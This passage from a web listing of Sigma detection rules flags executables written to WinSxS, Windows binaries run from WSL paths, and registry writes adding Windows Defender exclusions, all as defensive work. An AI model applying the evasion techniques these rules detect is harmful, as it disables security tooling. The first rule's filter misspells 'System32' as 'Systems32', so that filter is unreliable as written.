author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-11
tags:
- attack.execution
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|startswith: 'C:\Windows\WinSxS\'
TargetFilename|endswith: '.exe'
filter_main_system_location:
Image|startswith:
- 'C:\Windows\Systems32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\WinSxS\'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Windows Binary Executed From WSL
Detects the execution of Windows binaries from within a WSL instance.
This could be used to masquerade parent-child relationships
view Sigma YAML
title: Windows Binary Executed From WSL
id: ed825c86-c009-4014-b413-b76003e33d35
status: test
description: |
Detects the execution of Windows binaries from within a WSL instance.
This could be used to masquerade parent-child relationships
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-14
tags:
- attack.execution
- attack.stealth
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
Image|re: '[a-zA-Z]:\\'
CurrentDirectory|contains: '\\\\wsl.localhost' # Note: programs not supporting UNC paths (example: cmd.exe). Will default to another location
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Windows Defender Exclusions Added - Registry
Detects the Setting of Windows Defender Exclusions
view Sigma YAML
title: Windows Defender Exclusions Added - Registry
id: a982fc9c-6333-4ffb-a51d-addb04e8b529
related:
- id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f
type: derived
status: test
description: Detects the Setting of Windows Defender Exclusions
references:
- https://twitter.com/_nullbind/status/1204923340810543109
author: Christian Burkard (Nextron Systems)
date: 2021-07-06
modified: 2023-08-17
tags:
- attack.defense-impairment
- attack.t1685
logsource:
product: windows
category: registry_set
detection:
selection2:
TargetObject|contains: '\Microsoft\Windows Defender\Exclusions'
condition: selection2
falsepositives:
- Administrator actions
level: medium
Convert to SIEM query
Showing 501-550 of 559